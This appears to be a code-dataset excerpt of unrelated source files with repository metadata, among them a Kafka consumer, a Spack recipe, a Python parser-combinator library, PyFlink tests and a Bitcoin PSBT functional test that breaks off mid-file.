self.denbi_project_map[project_id]['members'].remove(user_id)
self.logger.info("Remove user %s from project %s.", user_id, project_id)
def projects_memberlist(self, perun_id):
"""
Return a list of members
:param perun_id: perun id of an project
:return: Return a list of members
"""
return self.denbi_project_map[perun_id]['members']
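# Usage sketch (illustrative only; the domain name, role and perun/elixir ids below are made-up
# values, and real use requires reachable OpenStack credentials via clouds.yaml or OS_* variables):
#
#     ks = KeyStone(target_domain_name='elixir', default_role='user',
#                   create_default_role=True, read_only=True)
#     ks.users_map()       # build the perun_id -> denbi_user map
#     ks.projects_map()    # build the perun_id -> denbi_project map
#     ks.users_create(elixir_id='alice@elixir-europe.org', perun_id='42')
#     ks.projects_create(perun_id='100', name='demo-project', members=['42'])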
| 44.026012
| 264
| 0.578809
|
c64d65b2d43e130ffd11994de90817ec1d7e1c4d
| 424
|
py
|
Python
|
kafka_prod/python-subscriber/src/app.py
|
RADM5TSIZE/Big_Data
|
caa3fe97fc180a89f117a10de85bf5e6e7c04d01
|
[
"Apache-2.0"
] | null | null | null |
kafka_prod/python-subscriber/src/app.py
|
RADM5TSIZE/Big_Data
|
caa3fe97fc180a89f117a10de85bf5e6e7c04d01
|
[
"Apache-2.0"
] | null | null | null |
kafka_prod/python-subscriber/src/app.py
|
RADM5TSIZE/Big_Data
|
caa3fe97fc180a89f117a10de85bf5e6e7c04d01
|
[
"Apache-2.0"
] | 1
|
2021-09-01T12:08:34.000Z
|
2021-09-01T12:08:34.000Z
|
# Install: pip3 install kafka-python
from kafka import KafkaConsumer
# The bootstrap server to connect to
bootstrap = 'my-cluster-kafka-bootstrap:9092'
# Create a consumer instance
# cf.
print('Starting KafkaConsumer')
consumer = KafkaConsumer('big_data_demo', # <-- topics
bootstrap_servers=bootstrap)
# Print out all received messages
for msg in consumer:
print("Message Received: ", msg)
| 26.5
| 55
| 0.71934
|
a9f6d98cb1e9ab659dc1637b0172d31fa56b3e9f
| 115
|
py
|
Python
|
shake-shake_pytorch/models/__init__.py
|
ychnlgy/Chebyshev-Lagrange
|
74292e72b83f992d6c42a2f2db04dfdce5a52aea
|
[
"MIT"
] | 1
|
2021-08-19T14:28:45.000Z
|
2021-08-19T14:28:45.000Z
|
shake-shake_pytorch/models/__init__.py
|
ychnlgy/Chebyshev-Lagrange
|
74292e72b83f992d6c42a2f2db04dfdce5a52aea
|
[
"MIT"
] | null | null | null |
shake-shake_pytorch/models/__init__.py
|
ychnlgy/Chebyshev-Lagrange
|
74292e72b83f992d6c42a2f2db04dfdce5a52aea
|
[
"MIT"
] | 1
|
2022-03-11T07:20:06.000Z
|
2022-03-11T07:20:06.000Z
|
from . import polynomial
from models.shake_resnet import ShakeResNet
from models.shake_resnext import ShakeResNeXt
| 28.75
| 45
| 0.869565
|
f91e2b6cce15ff97e461aa389facc75a99c417f5
| 687
|
py
|
Python
|
var/spack/repos/builtin/packages/py-glob2/package.py
|
player1537-forks/spack
|
822b7632222ec5a91dc7b7cda5fc0e08715bd47c
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 11
|
2015-10-04T02:17:46.000Z
|
2018-02-07T18:23:00.000Z
|
var/spack/repos/builtin/packages/py-glob2/package.py
|
player1537-forks/spack
|
822b7632222ec5a91dc7b7cda5fc0e08715bd47c
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 22
|
2017-08-01T22:45:10.000Z
|
2022-03-10T07:46:31.000Z
|
var/spack/repos/builtin/packages/py-glob2/package.py
|
player1537-forks/spack
|
822b7632222ec5a91dc7b7cda5fc0e08715bd47c
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 4
|
2016-06-10T17:57:39.000Z
|
2018-09-11T04:59:38.000Z
|
# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyGlob2(PythonPackage):
"""Version of the glob module that can capture patterns
and supports recursive wildcards."""
homepage = "http://github.com/miracle2k/python-glob2/"
pypi = "glob2/glob2-0.7.tar.gz"
version('0.7', sha256='85c3dbd07c8aa26d63d7aacee34fa86e9a91a3873bc30bf62ec46e531f92ab8c')
version('0.6', sha256='f5b0a686ff21f820c4d3f0c4edd216704cea59d79d00fa337e244a2f2ff83ed6')
depends_on('py-setuptools', type='build')
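# Usage sketch (standard Spack workflow, not specific to this package):
#     spack install py-glob2
#     spack load py-glob2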
| 34.35
| 93
| 0.754003
|
628a12335c07b8259147f92545d3c1563a855af3
| 1,585
|
py
|
Python
|
scatter_plot/ImageScatterPlot.py
|
myazdani/pyImagePlot
|
8b23385691cc6d6de5d5b1dccb967b0d51fd73bd
|
[
"MIT",
"Unlicense"
] | 10
|
2016-08-28T19:52:45.000Z
|
2021-04-05T04:10:37.000Z
|
scatter_plot/ImageScatterPlot.py
|
myazdani/pyImagePlot
|
8b23385691cc6d6de5d5b1dccb967b0d51fd73bd
|
[
"MIT",
"Unlicense"
] | 1
|
2019-08-30T07:17:47.000Z
|
2019-09-02T16:15:23.000Z
|
scatter_plot/ImageScatterPlot.py
|
myazdani/pyImagePlot
|
8b23385691cc6d6de5d5b1dccb967b0d51fd73bd
|
[
"MIT",
"Unlicense"
] | 5
|
2015-07-10T21:20:36.000Z
|
2020-06-05T05:12:24.000Z
|
import os
from PIL import Image, ImageDraw
from pylab import *
import csv
class ImageScatterPlot:
def __init__(self):
self.h, self.w = 20000,20000
self.resize_h = 275
self.resize_w = 275
def create_save_fig(self, image_paths, projected_features, out_file):
img_scatter = self.create_fig(image_paths, projected_features)
self.save_fig(img_scatter, out_file)
def create_fig(self, image_paths, projected_features):
img = Image.new('RGB',(self.w,self.h),(255,255,255))
draw = ImageDraw.Draw(img)
scale = abs(projected_features).max(0)
scaled = floor(array([ (p / scale) * (self.w/2-20,self.h/2-20) + (self.w/2,self.h/2) for p in projected_features]))
print "number of images", len(image_paths)
for i in range(len(image_paths)):
nodeim = Image.open(image_paths[i])
nodeim = nodeim.resize((self.resize_w,self.resize_h))
ns = nodeim.size
img.paste(nodeim,(int(scaled[i][0]-ns[0]//2),int(scaled[i][1]-ns[1]//2),int(scaled[i][0]+ns[0]//2+1),int(scaled[i][1]+ns[1]//2+1)))
return img
def save_fig(self, img, out_file):
img.save(out_file)
if __name__ == "__main__":
in_file = "PNAR-tsne-HOG-color.csv"
out_file = "res-class.jpg"
rows = []
    with open(in_file, 'r', newline='') as f:
reader = csv.reader(f)
for row in reader:
rows.append(row)
rows.pop(0)
image_paths = [row[0] for row in rows]
features = array([(float(row[1]), float(row[2])) for row in rows])
ImageScatterPlot().create_save_fig(image_paths = image_paths, projected_features = features, out_file = out_file)
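# Expected input format (inferred from the __main__ block above): a CSV with one header row,
# then one row per image as <image path>,<x>,<y>, where x and y are the projected coordinates, e.g.
#     filename,x,y
#     images/fish_001.jpg,0.12,-0.53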
| 33.723404
| 138
| 0.66877
|
e1b00566f08dfee058b8855436845e19443e6115
| 551
|
py
|
Python
|
tests/rl/settings.py
|
UIA-CAIR/Multitask
|
b0d9ac348a56c97ca7826de358bd0428c7a90992
|
[
"Unlicense"
] | 14
|
2017-12-15T01:27:40.000Z
|
2018-02-06T19:28:35.000Z
|
tests/rl/settings.py
|
UIA-CAIR/Multitask
|
b0d9ac348a56c97ca7826de358bd0428c7a90992
|
[
"Unlicense"
] | 3
|
2018-04-26T09:38:18.000Z
|
2021-04-15T08:22:09.000Z
|
tests/rl/settings.py
|
UIA-CAIR/Multitask
|
b0d9ac348a56c97ca7826de358bd0428c7a90992
|
[
"Unlicense"
] | 5
|
2018-01-14T18:51:05.000Z
|
2018-02-04T06:29:38.000Z
|
settings = {
"learning_rate": 1e-6,
"memory_size": 1000000, # 1 Million frames in memory
"epsilon_start": 0.5, # Start of epsilon decent
"epsilon_end": 0.0, # End of epsilon decent
"epsilon_steps": 100000, # Epsilon steps
"exploration_wins": 0, # Number of victories using random moves before starting epsilon phase
"batch_size": 16,
"discount_factor": 0.99,
"grayscale": False,
"load_latest_checkpoint": False,
}
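# Note (assuming a linear decay schedule, which these keys suggest but do not enforce by themselves):
# epsilon would fall from 0.5 to 0.0 over 100000 steps, i.e. by (0.5 - 0.0) / 100000 = 5e-6 per step.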
| 45.916667
| 114
| 0.558984
|
40d9c4f2b4c4c4b5e8893a2e5b17524ba9cba4d8
| 2,322
|
py
|
Python
|
parser_min.py
|
davidmaamoaix/parser-combinator-boilerplate
|
516f652b2bf27a3751f32d4d027649ac7406b59b
|
[
"MIT"
] | null | null | null |
parser_min.py
|
davidmaamoaix/parser-combinator-boilerplate
|
516f652b2bf27a3751f32d4d027649ac7406b59b
|
[
"MIT"
] | null | null | null |
parser_min.py
|
davidmaamoaix/parser-combinator-boilerplate
|
516f652b2bf27a3751f32d4d027649ac7406b59b
|
[
"MIT"
] | null | null | null |
accum=lambda s,p:s.a[0](*p) if len(p)>=s.a[2] else Curry(s.a[0],p,s.a[2])
class Curry:
__init__=lambda s,f,p,l=None:setattr(s,'a',
[f,p,f.__code__.co_argcount if l is None else l])
__call__=lambda s,*a:accum(s,[*s.a[1],*a])
curry=lambda x,l=None:x if isinstance(x,Curry) else Curry(x,[],l)
lift2A=curry(lambda f,fa,fb:f@fa*fb)
flip=curry(lambda f,a,b:f(b,a))
fmap=curry(lambda f,a:f@a)
add=curry(lambda a,b:a+b)
prepend=curry(lambda a,b:[a,*b])
compose=curry(lambda f,g:lambda x:f(g(x)))
eq=curry(lambda a,b:a==b)
const=curry(lambda a,_:a)
tup=curry(lambda a,b:(a,b))
join=curry(''.join,1)
debug=curry(print,1)
class Parser:
__init__=lambda s,f:setattr(s,'p',f)
__rmatmul__=lambda s,f:Parser(lambda x,s=s,f=f:[(r,curry(f)(v)) \
for (r,v) in s.p(x)])
_pure=classmethod(lambda cls,a:Parser(lambda s,a=a:[(s,a)]))
__mul__=lambda s,a:Parser(lambda x,s=s,a=a:sum(([(ra,vf(va)) \
for (ra,va) in a.p(rf)] for (rf,vf) in s.p(x)),[]))
__lshift__=lambda s,o:lift2A(const)(s,o)
__rshift__=lambda s,o:lift2A(flip(const))(s)(o)
_empty=classmethod(lambda c:Parser(lambda s:[]))
__or__=lambda s,o:Parser(lambda x,s=s,o=o:s.p(x)+o.p(x))
_ret=classmethod(lambda c,a:pure(a))
__xor__=lambda s,f:Parser(lambda x,s=s,f=f:sum((f(v).p(r) \
for (r,v) in s.p(x)),[]))
def many(p):
def inner(s):
return sum(((lambda result:[(ro,[vo])] if not result else \
[(ro,[vo])]+[(ri,[vo,*vi]) for (ri,vi) in result])\
(inner(ro)) for (ro,vo) in p.p(s)),[])
return Parser(inner)|pure([])
string=(lambda c:c(c))(lambda f:lambda s:pure('') \
if not s else add@char(s[0])*f(f)(s[1:]))
empty=Parser._empty()
pure=Parser._pure
wild=Parser(lambda s:[] if not s else [(s[1:],s[0])])
pred=lambda p,w=wild:w^(lambda c:pure(c) if p(c) else empty)
char=lambda c:pred(eq(c))
any_of=lambda x:pred(lambda c:c in x)
none_of=lambda x:pred(lambda c:c not in x)
between=curry(lambda start,end,p:start>>p<<end)
many1=lambda p:p^(lambda x:many(p)^(lambda xs:pure([x,*xs])))
sep1=curry(lambda p,s:p^(lambda x:many(s>>p)^(lambda xs:pure([x,*xs]))))
sep=curry(lambda p,s:sep1(p,s)|pure([]))
spaces=many(any_of('\n\t '))
wwrap=lambda p:spaces>>p<<spaces
digit=any_of('1234567890')
end=Parser(lambda s:[('','')] if not s else [])
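# Illustrative usage sketch (not part of the original file): parse one or more
# digits and require the input to be fully consumed.
#   number = join@many1(digit) << end
#   print(number.p("42"))  # -> [('', '42')]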
| 43
| 73
| 0.615418
|
83c7e65db6d4f795ad0ecc58ed1b17b194b888f7
| 226
|
py
|
Python
|
tests/resources/mlflow-test-plugin/mlflow_test_plugin/local_artifact.py
|
iPieter/kiwi
|
76b66872fce68873809a0dea112e2ed552ae5b63
|
[
"Apache-2.0"
] | null | null | null |
tests/resources/mlflow-test-plugin/mlflow_test_plugin/local_artifact.py
|
iPieter/kiwi
|
76b66872fce68873809a0dea112e2ed552ae5b63
|
[
"Apache-2.0"
] | 1
|
2021-01-24T13:34:51.000Z
|
2021-01-24T13:34:51.000Z
|
tests/resources/mlflow-test-plugin/mlflow_test_plugin/local_artifact.py
|
iPieter/kiwi
|
76b66872fce68873809a0dea112e2ed552ae5b63
|
[
"Apache-2.0"
] | null | null | null |
from kiwi.store.artifact.local_artifact_repo import LocalArtifactRepository
class PluginLocalArtifactRepository(LocalArtifactRepository):
"""LocalArtifactRepository provided through plugin system"""
is_plugin = True
| 32.285714
| 75
| 0.836283
|
51da30289bf76c045ba4cd54c25955d947b7d915
| 3,694
|
py
|
Python
|
flink-python/pyflink/table/tests/test_set_operation.py
|
tamirsagi/flink
|
778483a0a387251bc8b78f23b41352a1fbf146a2
|
[
"Apache-2.0"
] | null | null | null |
flink-python/pyflink/table/tests/test_set_operation.py
|
tamirsagi/flink
|
778483a0a387251bc8b78f23b41352a1fbf146a2
|
[
"Apache-2.0"
] | null | null | null |
flink-python/pyflink/table/tests/test_set_operation.py
|
tamirsagi/flink
|
778483a0a387251bc8b78f23b41352a1fbf146a2
|
[
"Apache-2.0"
] | 2
|
2022-02-15T07:05:13.000Z
|
2022-03-18T07:08:20.000Z
|
################################################################################
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
from pyflink.testing.test_case_utils import PyFlinkOldBatchTableTestCase
class StreamTableSetOperationTests(PyFlinkOldBatchTableTestCase):
data1 = [(1, "Hi", "Hello")]
data2 = [(3, "Hello", "Hello")]
schema = ["a", "b", "c"]
def test_minus(self):
t_env = self.t_env
t1 = t_env.from_elements(self.data1, self.schema)
t2 = t_env.from_elements(self.data2, self.schema)
result = t1.minus(t2)
self.assertEqual('MINUS', result._j_table.getQueryOperation().getType().toString())
self.assertFalse(result._j_table.getQueryOperation().isAll())
def test_minus_all(self):
t_env = self.t_env
t1 = t_env.from_elements(self.data1, self.schema)
t2 = t_env.from_elements(self.data2, self.schema)
result = t1.minus_all(t2)
self.assertEqual('MINUS', result._j_table.getQueryOperation().getType().toString())
self.assertTrue(result._j_table.getQueryOperation().isAll())
def test_union(self):
t_env = self.t_env
t1 = t_env.from_elements(self.data1, self.schema)
t2 = t_env.from_elements(self.data2, self.schema)
result = t1.union(t2)
self.assertEqual('UNION', result._j_table.getQueryOperation().getType().toString())
self.assertFalse(result._j_table.getQueryOperation().isAll())
def test_union_all(self):
t_env = self.t_env
t1 = t_env.from_elements(self.data1, self.schema)
t2 = t_env.from_elements(self.data2, self.schema)
result = t1.union_all(t2)
self.assertEqual('UNION', result._j_table.getQueryOperation().getType().toString())
self.assertTrue(result._j_table.getQueryOperation().isAll())
def test_intersect(self):
t_env = self.t_env
t1 = t_env.from_elements(self.data1, self.schema)
t2 = t_env.from_elements(self.data2, self.schema)
result = t1.intersect(t2)
self.assertEqual('INTERSECT', result._j_table.getQueryOperation().getType().toString())
self.assertFalse(result._j_table.getQueryOperation().isAll())
def test_intersect_all(self):
t_env = self.t_env
t1 = t_env.from_elements(self.data1, self.schema)
t2 = t_env.from_elements(self.data2, self.schema)
result = t1.intersect_all(t2)
self.assertEqual('INTERSECT', result._j_table.getQueryOperation().getType().toString())
self.assertTrue(result._j_table.getQueryOperation().isAll())
if __name__ == '__main__':
import unittest
try:
import xmlrunner
testRunner = xmlrunner.XMLTestRunner(output='target/test-reports')
except ImportError:
testRunner = None
unittest.main(testRunner=testRunner, verbosity=2)
| 39.72043
| 95
| 0.661072
|
389abffd1089c4834157e7e4a1b04cb6bdbef15e
| 756
|
bzl
|
Python
|
tools/build_rules/proto.bzl
|
google/qrisp
|
1970d13166cddcd05cb10fccdb34247c7b0dddf3
|
[
"Apache-2.0"
] | 11
|
2015-12-14T07:03:31.000Z
|
2020-03-15T07:13:27.000Z
|
tools/build_rules/proto.bzl
|
google/qrisp
|
1970d13166cddcd05cb10fccdb34247c7b0dddf3
|
[
"Apache-2.0"
] | 1
|
2016-04-01T20:40:12.000Z
|
2016-04-06T00:01:34.000Z
|
tools/build_rules/proto.bzl
|
google/qrisp
|
1970d13166cddcd05cb10fccdb34247c7b0dddf3
|
[
"Apache-2.0"
] | 10
|
2016-02-25T08:08:09.000Z
|
2021-10-21T12:40:33.000Z
|
proto_filetype = FileType([".proto"])
# code adapted from mzhaom.
def proto_library(name, src, deps = None):
proto_cc_deps = [
"//google/protobuf:protoc",
]
cc_deps = [
"//google/protobuf:protobuf"
]
command = "$(location //google/protobuf:protoc) --cpp_out=$(GENDIR)/"
command += " $(location %s)" % (src)
basename = src[0:-5]
cc_proto_name = name + "_cc_proto"
header_outputs = [
basename + "pb.h",
]
outputs = header_outputs + [
basename + "pb.cc",
]
native.genrule(
name = cc_proto_name,
srcs = [ src ] + proto_cc_deps,
cmd = command,
outs = outputs,
)
native.cc_library(
name = name,
hdrs = header_outputs,
srcs = [
":" + cc_proto_name
],
deps = cc_deps,
)
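# Illustrative usage sketch (not part of the original file; target and file
# names are hypothetical). In a BUILD file:
#   load("//tools/build_rules:proto.bzl", "proto_library")
#   proto_library(
#       name = "example_proto",
#       src = "example.proto",
#   )
# This runs protoc through a genrule to produce example.pb.h/example.pb.cc and
# wraps them in the cc_library ":example_proto".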
| 19.894737
| 71
| 0.589947
|
c434a7b0a3be733b519f2a9830a7747433766ceb
| 165
|
py
|
Python
|
News/admin.py
|
pajuhesh80/NewsBlog
|
0712dc76703d89d8d0881d568d2aa902372a7b8f
|
[
"MIT"
] | 6
|
2022-01-29T15:45:15.000Z
|
2022-03-28T21:04:22.000Z
|
News/admin.py
|
pajuhesh80/NewsBlog
|
0712dc76703d89d8d0881d568d2aa902372a7b8f
|
[
"MIT"
] | null | null | null |
News/admin.py
|
pajuhesh80/NewsBlog
|
0712dc76703d89d8d0881d568d2aa902372a7b8f
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import *
admin.site.register(Category)
admin.site.register(Post)
admin.site.register(Comment)
admin.site.register(Ad)
| 20.625
| 32
| 0.806061
|
7ea318d468da0cce576df316d7876846087dc3f9
| 255
|
py
|
Python
|
sample_register/sample_register/doctype/test/test_test.py
|
TRUFIL/sampreg
|
d14155954b3a22b0a727d61e55f3619ade448379
|
[
"MIT"
] | null | null | null |
sample_register/sample_register/doctype/test/test_test.py
|
TRUFIL/sampreg
|
d14155954b3a22b0a727d61e55f3619ade448379
|
[
"MIT"
] | null | null | null |
sample_register/sample_register/doctype/test/test_test.py
|
TRUFIL/sampreg
|
d14155954b3a22b0a727d61e55f3619ade448379
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2015, indictrans and Contributors
# See license.txt
from __future__ import unicode_literals
import frappe
import unittest
# test_records = frappe.get_test_records('Test')
class TestTest(unittest.TestCase):
pass
| 19.615385
| 49
| 0.764706
|
5cd5613412b58cdd02d038b4d537fa6d5c5a56a3
| 15,383
|
py
|
Python
|
test/functional/rpc_psbt.py
|
opensourcerulez/xaya
|
0bd3b6658c29f04bc8a40dbc9cc35fbdb26ff3cf
|
[
"MIT"
] | null | null | null |
test/functional/rpc_psbt.py
|
opensourcerulez/xaya
|
0bd3b6658c29f04bc8a40dbc9cc35fbdb26ff3cf
|
[
"MIT"
] | null | null | null |
test/functional/rpc_psbt.py
|
opensourcerulez/xaya
|
0bd3b6658c29f04bc8a40dbc9cc35fbdb26ff3cf
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the Partially Signed Transaction RPCs.
"""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal, assert_raises_rpc_error, find_output, disconnect_nodes, connect_nodes_bi, sync_blocks
import json
import os
MAX_BIP125_RBF_SEQUENCE = 0xfffffffd
# Create one-input, one-output, no-fee transaction:
class PSBTTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = False
self.num_nodes = 3
# Upstream Bitcoin has p2sh-segwit as default address type and this
# test depends on that. Since we changed it (for now, pending
# segwit activation in Namecoin), explicitly specify the address
# type for this test.
self.extra_args = [["-addresstype=p2sh-segwit"]] * self.num_nodes
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def test_utxo_conversion(self):
mining_node = self.nodes[2]
offline_node = self.nodes[0]
online_node = self.nodes[1]
# Disconnect offline node from others
disconnect_nodes(offline_node, 1)
disconnect_nodes(online_node, 0)
disconnect_nodes(offline_node, 2)
disconnect_nodes(mining_node, 0)
# Mine a transaction that credits the offline address
offline_addr = offline_node.getnewaddress(address_type="p2sh-segwit")
online_addr = online_node.getnewaddress(address_type="p2sh-segwit")
online_node.importaddress(offline_addr, "", False)
mining_node.sendtoaddress(address=offline_addr, amount=1.0)
mining_node.generate(nblocks=1)
sync_blocks([mining_node, online_node])
# Construct an unsigned PSBT on the online node (who doesn't know the output is Segwit, so will include a non-witness UTXO)
utxos = online_node.listunspent(addresses=[offline_addr])
raw = online_node.createrawtransaction([{"txid":utxos[0]["txid"], "vout":utxos[0]["vout"]}],[{online_addr:0.9999}])
psbt = online_node.walletprocesspsbt(online_node.converttopsbt(raw))["psbt"]
assert("non_witness_utxo" in mining_node.decodepsbt(psbt)["inputs"][0])
# Have the offline node sign the PSBT (which will update the UTXO to segwit)
signed_psbt = offline_node.walletprocesspsbt(psbt)["psbt"]
assert("witness_utxo" in mining_node.decodepsbt(signed_psbt)["inputs"][0])
# Make sure we can mine the resulting transaction
txid = mining_node.sendrawtransaction(mining_node.finalizepsbt(signed_psbt)["hex"])
mining_node.generate(1)
sync_blocks([mining_node, online_node])
assert_equal(online_node.gettxout(txid,0)["confirmations"], 1)
# Reconnect
connect_nodes_bi(self.nodes, 0, 1)
connect_nodes_bi(self.nodes, 0, 2)
def run_test(self):
# Activate segwit at height 432.
        self.nodes[0].generate(500)
self.sync_all()
# Create and fund a raw tx for sending 10 BTC
psbtx1 = self.nodes[0].walletcreatefundedpsbt([], {self.nodes[2].getnewaddress():10})['psbt']
        # Node 1 should not be able to add anything to it, but should still return the psbt unchanged
psbtx = self.nodes[1].walletprocesspsbt(psbtx1)['psbt']
assert_equal(psbtx1, psbtx)
# Sign the transaction and send
signed_tx = self.nodes[0].walletprocesspsbt(psbtx)['psbt']
final_tx = self.nodes[0].finalizepsbt(signed_tx)['hex']
self.nodes[0].sendrawtransaction(final_tx)
# Create p2sh, p2wpkh, and p2wsh addresses
pubkey0 = self.nodes[0].getaddressinfo(self.nodes[0].getnewaddress())['pubkey']
pubkey1 = self.nodes[1].getaddressinfo(self.nodes[1].getnewaddress())['pubkey']
pubkey2 = self.nodes[2].getaddressinfo(self.nodes[2].getnewaddress())['pubkey']
p2sh = self.nodes[1].addmultisigaddress(2, [pubkey0, pubkey1, pubkey2], "", "legacy")['address']
p2wsh = self.nodes[1].addmultisigaddress(2, [pubkey0, pubkey1, pubkey2], "", "bech32")['address']
p2sh_p2wsh = self.nodes[1].addmultisigaddress(2, [pubkey0, pubkey1, pubkey2], "", "p2sh-segwit")['address']
p2wpkh = self.nodes[1].getnewaddress("", "bech32")
p2pkh = self.nodes[1].getnewaddress("", "legacy")
p2sh_p2wpkh = self.nodes[1].getnewaddress("", "p2sh-segwit")
# fund those addresses
rawtx = self.nodes[0].createrawtransaction([], {p2sh:10, p2wsh:10, p2wpkh:10, p2sh_p2wsh:10, p2sh_p2wpkh:10, p2pkh:10})
rawtx = self.nodes[0].fundrawtransaction(rawtx, {"changePosition":3})
signed_tx = self.nodes[0].signrawtransactionwithwallet(rawtx['hex'])['hex']
txid = self.nodes[0].sendrawtransaction(signed_tx)
self.nodes[0].generate(6)
self.sync_all()
# Find the output pos
p2sh_pos = -1
p2wsh_pos = -1
p2wpkh_pos = -1
p2pkh_pos = -1
p2sh_p2wsh_pos = -1
p2sh_p2wpkh_pos = -1
decoded = self.nodes[0].decoderawtransaction(signed_tx)
for out in decoded['vout']:
if out['scriptPubKey']['addresses'][0] == p2sh:
p2sh_pos = out['n']
elif out['scriptPubKey']['addresses'][0] == p2wsh:
p2wsh_pos = out['n']
elif out['scriptPubKey']['addresses'][0] == p2wpkh:
p2wpkh_pos = out['n']
elif out['scriptPubKey']['addresses'][0] == p2sh_p2wsh:
p2sh_p2wsh_pos = out['n']
elif out['scriptPubKey']['addresses'][0] == p2sh_p2wpkh:
p2sh_p2wpkh_pos = out['n']
elif out['scriptPubKey']['addresses'][0] == p2pkh:
p2pkh_pos = out['n']
# spend single key from node 1
rawtx = self.nodes[1].walletcreatefundedpsbt([{"txid":txid,"vout":p2wpkh_pos},{"txid":txid,"vout":p2sh_p2wpkh_pos},{"txid":txid,"vout":p2pkh_pos}], {self.nodes[1].getnewaddress():29.99})['psbt']
walletprocesspsbt_out = self.nodes[1].walletprocesspsbt(rawtx)
assert_equal(walletprocesspsbt_out['complete'], True)
self.nodes[1].sendrawtransaction(self.nodes[1].finalizepsbt(walletprocesspsbt_out['psbt'])['hex'])
# partially sign multisig things with node 1
psbtx = self.nodes[1].walletcreatefundedpsbt([{"txid":txid,"vout":p2wsh_pos},{"txid":txid,"vout":p2sh_pos},{"txid":txid,"vout":p2sh_p2wsh_pos}], {self.nodes[1].getnewaddress():29.99})['psbt']
walletprocesspsbt_out = self.nodes[1].walletprocesspsbt(psbtx)
psbtx = walletprocesspsbt_out['psbt']
assert_equal(walletprocesspsbt_out['complete'], False)
# partially sign with node 2. This should be complete and sendable
walletprocesspsbt_out = self.nodes[2].walletprocesspsbt(psbtx)
assert_equal(walletprocesspsbt_out['complete'], True)
self.nodes[2].sendrawtransaction(self.nodes[2].finalizepsbt(walletprocesspsbt_out['psbt'])['hex'])
# check that walletprocesspsbt fails to decode a non-psbt
rawtx = self.nodes[1].createrawtransaction([{"txid":txid,"vout":p2wpkh_pos}], {self.nodes[1].getnewaddress():9.99})
assert_raises_rpc_error(-22, "TX decode failed", self.nodes[1].walletprocesspsbt, rawtx)
# Convert a non-psbt to psbt and make sure we can decode it
rawtx = self.nodes[0].createrawtransaction([], {self.nodes[1].getnewaddress():10})
rawtx = self.nodes[0].fundrawtransaction(rawtx)
new_psbt = self.nodes[0].converttopsbt(rawtx['hex'])
self.nodes[0].decodepsbt(new_psbt)
# Make sure that a psbt with signatures cannot be converted
signedtx = self.nodes[0].signrawtransactionwithwallet(rawtx['hex'])
assert_raises_rpc_error(-22, "TX decode failed", self.nodes[0].converttopsbt, signedtx['hex'])
assert_raises_rpc_error(-22, "TX decode failed", self.nodes[0].converttopsbt, signedtx['hex'], False)
# Unless we allow it to convert and strip signatures
self.nodes[0].converttopsbt(signedtx['hex'], True)
# Explicitly allow converting non-empty txs
new_psbt = self.nodes[0].converttopsbt(rawtx['hex'])
self.nodes[0].decodepsbt(new_psbt)
# Create outputs to nodes 1 and 2
node1_addr = self.nodes[1].getnewaddress()
node2_addr = self.nodes[2].getnewaddress()
txid1 = self.nodes[0].sendtoaddress(node1_addr, 13)
        txid2 = self.nodes[0].sendtoaddress(node2_addr, 13)
self.nodes[0].generate(6)
self.sync_all()
vout1 = find_output(self.nodes[1], txid1, 13)
vout2 = find_output(self.nodes[2], txid2, 13)
# Create a psbt spending outputs from nodes 1 and 2
psbt_orig = self.nodes[0].createpsbt([{"txid":txid1, "vout":vout1}, {"txid":txid2, "vout":vout2}], {self.nodes[0].getnewaddress():25.999})
# Update psbts, should only have data for one input and not the other
psbt1 = self.nodes[1].walletprocesspsbt(psbt_orig)['psbt']
psbt1_decoded = self.nodes[0].decodepsbt(psbt1)
assert psbt1_decoded['inputs'][0] and not psbt1_decoded['inputs'][1]
psbt2 = self.nodes[2].walletprocesspsbt(psbt_orig)['psbt']
psbt2_decoded = self.nodes[0].decodepsbt(psbt2)
assert not psbt2_decoded['inputs'][0] and psbt2_decoded['inputs'][1]
# Combine, finalize, and send the psbts
combined = self.nodes[0].combinepsbt([psbt1, psbt2])
finalized = self.nodes[0].finalizepsbt(combined)['hex']
self.nodes[0].sendrawtransaction(finalized)
self.nodes[0].generate(6)
self.sync_all()
# Test additional args in walletcreatepsbt
# Make sure both pre-included and funded inputs
# have the correct sequence numbers based on
# replaceable arg
block_height = self.nodes[0].getblockcount()
unspent = self.nodes[0].listunspent()[0]
psbtx_info = self.nodes[0].walletcreatefundedpsbt([{"txid":unspent["txid"], "vout":unspent["vout"]}], [{self.nodes[2].getnewaddress():unspent["amount"]+1}], block_height+2, {"replaceable":True}, False)
decoded_psbt = self.nodes[0].decodepsbt(psbtx_info["psbt"])
for tx_in, psbt_in in zip(decoded_psbt["tx"]["vin"], decoded_psbt["inputs"]):
assert_equal(tx_in["sequence"], MAX_BIP125_RBF_SEQUENCE)
assert "bip32_derivs" not in psbt_in
assert_equal(decoded_psbt["tx"]["locktime"], block_height+2)
# Same construction with only locktime set
psbtx_info = self.nodes[0].walletcreatefundedpsbt([{"txid":unspent["txid"], "vout":unspent["vout"]}], [{self.nodes[2].getnewaddress():unspent["amount"]+1}], block_height, {}, True)
decoded_psbt = self.nodes[0].decodepsbt(psbtx_info["psbt"])
